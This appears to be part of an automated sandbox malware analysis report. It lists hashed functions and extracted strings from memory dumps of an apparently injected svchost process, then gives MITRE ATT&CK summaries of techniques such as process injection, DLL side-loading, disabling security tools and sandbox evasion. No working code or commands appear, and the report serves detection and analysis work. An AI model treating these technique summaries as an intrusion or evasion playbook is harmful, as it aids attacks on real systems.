API String ID:
Opcode ID: b132fbba219a833eac7de43f6cd2e5bbc1766bcac04056f2d314849011ad4d7d
Instruction ID: 8211d651b362f5e21e66e982da5936c1707d1d66404a258e8393621dcc3ee527
Opcode Fuzzy Hash: b132fbba219a833eac7de43f6cd2e5bbc1766bcac04056f2d314849011ad4d7d
Instruction Fuzzy Hash: 3090022124100C42D540B39885147070006C7D0701F91C855A1018554DC726896976B1

Function 03872F00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd1302f185dd027e9fc3b125d970700d6585529850b760ca86837860ad649d47
Instruction ID: 92ea020a22312484162f5727a88102e933ec8acfd6e0a1b3d7acc78bab784887
Opcode Fuzzy Hash: dd1302f185dd027e9fc3b125d970700d6585529850b760ca86837860ad649d47
Instruction Fuzzy Hash: 6B90022121180482D600B7A84D14B07000587D0303F91C959A1148554CCA2588656521

Function 03872F30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 307445f7766829cd8cf4d4bb56f8daa54c333aef81f5cab8d7ed28c6236229fa
Instruction ID: 54d76bd3997eec58b2c09c1046c7222bab6fcb53773a647ee9a19354d33635b4
Opcode Fuzzy Hash: 307445f7766829cd8cf4d4bb56f8daa54c333aef81f5cab8d7ed28c6236229fa
Instruction Fuzzy Hash: 8B90022120144882D540B3984904B0F410587E1302FD1C85DA514A554CCA2588596721

Function 03872E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae60f6c4d1ce8b5c179902fb1df973b66ee251df0c7449e5aa24eb0324932d1
Instruction ID: 24bf97c50d858babb21427635dd2f4d0a119f778bf9223c4a16838a1d16b06a7
Opcode Fuzzy Hash: dae60f6c4d1ce8b5c179902fb1df973b66ee251df0c7449e5aa24eb0324932d1
Instruction Fuzzy Hash: E790026121100482D504B3984504706004587E1301F91C856A3148554CC6398C656125

Function 03872EC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbe82d3ff695159af61276f39ba4b2f4f7465d71e517e60d0a559fe6a6577c16
Instruction ID: dd94b74388c5c2ecf4838e753e7b995a3c960d93ee88ae587df8a73e63349882
Opcode Fuzzy Hash: bbe82d3ff695159af61276f39ba4b2f4f7465d71e517e60d0a559fe6a6577c16
Instruction Fuzzy Hash: F090023120140842D500B3984908747000587D0302F91C855A6158555EC775C8957531

Function 03872ED0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ecea67ef2c8e81f2745c2f21829f50b9920a8013c0c146b7d17805bfeb6948
Instruction ID: 8a5008b35022df5e7d89723315a3511b97195f732020ae7014c0ad131391daa7
Opcode Fuzzy Hash: b0ecea67ef2c8e81f2745c2f21829f50b9920a8013c0c146b7d17805bfeb6948
Instruction Fuzzy Hash: CD900221601004824540B3A889449064005ABE1311791C965A198C550DC66988696665

Function 03872E00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe24c39286ccc32e7df04e6c6fa9b77b339e5b930973574063cc5f4688669982
Instruction ID: 1cac316c68fe66ceab03ae767d3ecefac7db3d6d6d99756933bbc6cdcbfd7c3c
Opcode Fuzzy Hash: fe24c39286ccc32e7df04e6c6fa9b77b339e5b930973574063cc5f4688669982
Instruction Fuzzy Hash: CF90026120140843D540B7984904607000587D0302F91C855A3058555ECB398C557135

Function 03872E50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af8d28e62cc504ca2cabd9edb1e3683778e4ff664dc35e2be30f917f93ed942
Instruction ID: c64a1089009a8f555e4b3f4bbd64ba7f5aeb918f0e7e9c2613b8babed66bba1d
Opcode Fuzzy Hash: 6af8d28e62cc504ca2cabd9edb1e3683778e4ff664dc35e2be30f917f93ed942
Instruction Fuzzy Hash: B590026134100882D500B3984514B060005C7E1301F91C859E2058554DC729CC567126

Function 03872DA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5d5dff34b3ec718a8cb662c8a6d8082b9bd46803079387bdbeca25cdd27bd4
Instruction ID: 3bff10a881135723f5ed1fdbed86059d98cca0510777929e08e5e9b886cfbdf3
Opcode Fuzzy Hash: 3c5d5dff34b3ec718a8cb662c8a6d8082b9bd46803079387bdbeca25cdd27bd4
Instruction Fuzzy Hash: 5A90022160100942D501B3984504616000A87D0341FD1C866A2018555ECB358996B131

Function 03872DC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc9b95f4b0f4d17010a13c00e3a5a5854e1a7b81e218c8a7e7fc0640925ac57
Instruction ID: e96b61b20236f0a040ef6253d5d1fd8710ec58e162c5a474c4ef5fc519dea198
Opcode Fuzzy Hash: 0bc9b95f4b0f4d17010a13c00e3a5a5854e1a7b81e218c8a7e7fc0640925ac57
Instruction Fuzzy Hash: 9F90027120100842D540B3984504746000587D0301F91C855A6058554EC7698DD97665

Function 03872D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6182b68b6dc2e6c0655cda6c70603741d1cdb75813c3025d1f957237214f5167
Instruction ID: 3e3fe3eacdf8f6acea1338325f64e96570c665b8be07748ec522c4d46ab74447
Opcode Fuzzy Hash: 6182b68b6dc2e6c0655cda6c70603741d1cdb75813c3025d1f957237214f5167
Instruction Fuzzy Hash: E690022130100842D502B39845146060009C7D1345FD1C856E2418555DC7358957B132

Function 03872CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a685d7d0fef930e124332b88f66286cc7e216b2a3ea3416be9821af54a379c5
Instruction ID: 3ce09ca79be9f001065de3415cf52cf0b1d1ffba12cd663356392086d2e9bba9
Opcode Fuzzy Hash: 8a685d7d0fef930e124332b88f66286cc7e216b2a3ea3416be9821af54a379c5
Instruction Fuzzy Hash: E890023124100842D541B3984504606000997D0341FD1C856A1418554EC7658A5ABA61

Function 03872CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348cc47a5c0c8f854fd2640aaa901c62882af5c003c1b6f141a9e556ef2c29c6
Instruction ID: abe897e09e3470398774ad15d551ffa21bb01b87fd71d94877bee2cc1c8e66b9
Opcode Fuzzy Hash: 348cc47a5c0c8f854fd2640aaa901c62882af5c003c1b6f141a9e556ef2c29c6
Instruction Fuzzy Hash: 67900221242045925945F3984504507400697E03417D1C856A2408950CC636985AE621

Function 03872C10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa49a1ae0676c5c28430caca5569cb2d8d8d017f8f9c7beed85d376ec83295df
Instruction ID: 55eef1d390e2fed41ac8fd20e610e5ce011ad4f3a18ac0dc04473dfefe573f0d
Opcode Fuzzy Hash: fa49a1ae0676c5c28430caca5569cb2d8d8d017f8f9c7beed85d376ec83295df
Instruction Fuzzy Hash: 3690023120100843D500B3985608707000587D0301F91DC55A1418558DD76688557121

Function 03872C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42af7f215bc58359974f17c6397bc603c0526ee4a5ef64de74a1aadf83356a03
Instruction ID: 8215ae1345305cc3c4174df1efb3ad80ba54fbe1febafdda1644505c040e9ebb
Opcode Fuzzy Hash: 42af7f215bc58359974f17c6397bc603c0526ee4a5ef64de74a1aadf83356a03
Instruction Fuzzy Hash: D290022120504882D500B7985508A06000587D0305F91D855A2058595DC7358855B131

Function 03872C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587308d6b77743fedd1e925af15eb0c5197096acb228fe620cc76b1795f12c11
Instruction ID: dce3300e5eeb8bf5099f2242b308c28b4e692327a8cc7fc78173c7fa34e661a0
Opcode Fuzzy Hash: 587308d6b77743fedd1e925af15eb0c5197096acb228fe620cc76b1795f12c11
Instruction Fuzzy Hash: 2590022921300442D580B398550860A000587D1302FD1DC59A1009558CCA25886D6321

Function 03872C50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362204a1de9bb39a41770120a60dfd596acbeb57471356d08a2cfe60d439d539
Instruction ID: fc322caf65db0fc73f94facb1e15f33ed9a5f0d1e468d831f22bca5ebbd82fed
Opcode Fuzzy Hash: 362204a1de9bb39a41770120a60dfd596acbeb57471356d08a2cfe60d439d539
Instruction Fuzzy Hash: 4590022130100443D540B39855186064005D7E1301F91D855E1408554CDA25885A6222

Function 038738D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8222decd9b532a1d23ff1c3b2cfa81f1812530919539a537e664267a4107e768
Instruction ID: 428af78d28e934f7de35f83145fcdb85ab694470b65c839bfc00f0aaaa1983cb
Opcode Fuzzy Hash: 8222decd9b532a1d23ff1c3b2cfa81f1812530919539a537e664267a4107e768
Instruction Fuzzy Hash: F090022124505542D550B39C45046164005A7E0301F91C865A1808594DC66588597221

Function 03873C90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5df6adbbf0513a2b42e62cc8b4c21ea161d97b63abc2d83271a597aecb964434
Instruction ID: ce7edc2241e45a0ee2206d08abab1c7b03c9a62e78c80fc928020d1c2687f29d
Opcode Fuzzy Hash: 5df6adbbf0513a2b42e62cc8b4c21ea161d97b63abc2d83271a597aecb964434
Instruction Fuzzy Hash: C090023520100842D910B3985904646004687D0301F91DC55A1418558DC76488A5B121

Function 03873C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ada08f69768ca6b53dedd57fa91d7a55181413990891c6213a7effc36c1ecab
Instruction ID: 358d95ea55721855658ccb8aed1c56c3098c3cc17d0cb215bab68de7cd1c3488
Opcode Fuzzy Hash: 5ada08f69768ca6b53dedd57fa91d7a55181413990891c6213a7effc36c1ecab
Instruction Fuzzy Hash: 89900231202005829940B3985904A4E410587E1302BD1DC59A1009554CCA2488656221

Function 03872B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: d4bd6520683d65c44b28c87a41a7456ed65e68ebbc9e99acc6239583bc0fdbc3
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 07943BEE Relevance: 15.1, Strings: 12, Instructions: 67COMMON

Download Yara Rule

Strings

)*6/, xrefs: 07943CA8
QRBJ, xrefs: 07943CA1
(11S, xrefs: 07943C77
MWQV, xrefs: 07943CF5
LQR, xrefs: 07943CFC
LRB/, xrefs: 07943CD9
WLRB, xrefs: 07943C1C
LQYB, xrefs: 07943C46
WQVL, xrefs: 07943C9A
W(KB, xrefs: 07943C7E
KB4, xrefs: 07943CC4
7YB#, xrefs: 07943C31

Memory Dump Source

Source File: 00000002.00000002.2649414106.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7940000_svchost.jbxd

Similarity

API ID:
String ID: KB4$(11S$)*6/$7YB#$LQR$LQYB$LRB/$MWQV$QRBJ$W(KB$WLRB$WQVL
API String ID: 0-257424583
Opcode ID: f96f43a0a872f2b1322e973c30051b9385e345cbedc2c59cd1a4f721c0ce77f0
Instruction ID: 8e5802ec39e057e403562b3ef7bfcd7218d23ebaf83e1cc7160362b376a216a8
Opcode Fuzzy Hash: f96f43a0a872f2b1322e973c30051b9385e345cbedc2c59cd1a4f721c0ce77f0
Instruction Fuzzy Hash: 743143B094064CEBCF18DF80E188ADDBBB1FB04348F819069E8596F240C7768669CF99

Function 03867550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038A4460
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038A4530
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038A454D
ExecuteOptions, xrefs: 038A44AB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038A4507
CLIENT(ntdll): Processing section info %ws..., xrefs: 038A4592
Execute=1, xrefs: 038A451E

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 6f93427dce78b1753b5a0525775676a712fb90f0a0a872b5b4f3346ddcae13ad
Instruction ID: 3c05f42753da55892cece6f384b3af0f63d298be8f97c34d15c6d1910d0dfbc9
Opcode Fuzzy Hash: 6f93427dce78b1753b5a0525775676a712fb90f0a0a872b5b4f3346ddcae13ad
Instruction Fuzzy Hash: 2651DD35A003196AEF10EAD9EC59FED736DEF04708F0405E9E515EB281DB70DA45CB91

Function 03839046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 03839095
$, xrefs: 038390B1

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 80605eb0cfe1acf5632b218dd36327f1606d23f71dc65ae9762f1b1790bc8e27
Instruction ID: 6a65eced014ea4ab7f0dec7fff18cf60c126b8147e9cf6e7bf196078c3bfc073
Opcode Fuzzy Hash: 80605eb0cfe1acf5632b218dd36327f1606d23f71dc65ae9762f1b1790bc8e27
Instruction Fuzzy Hash: 7A813B76D00269DBDB31CB94CC44BEEB6B8AB48710F0445EAE91AF7250D7709E84CFA1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

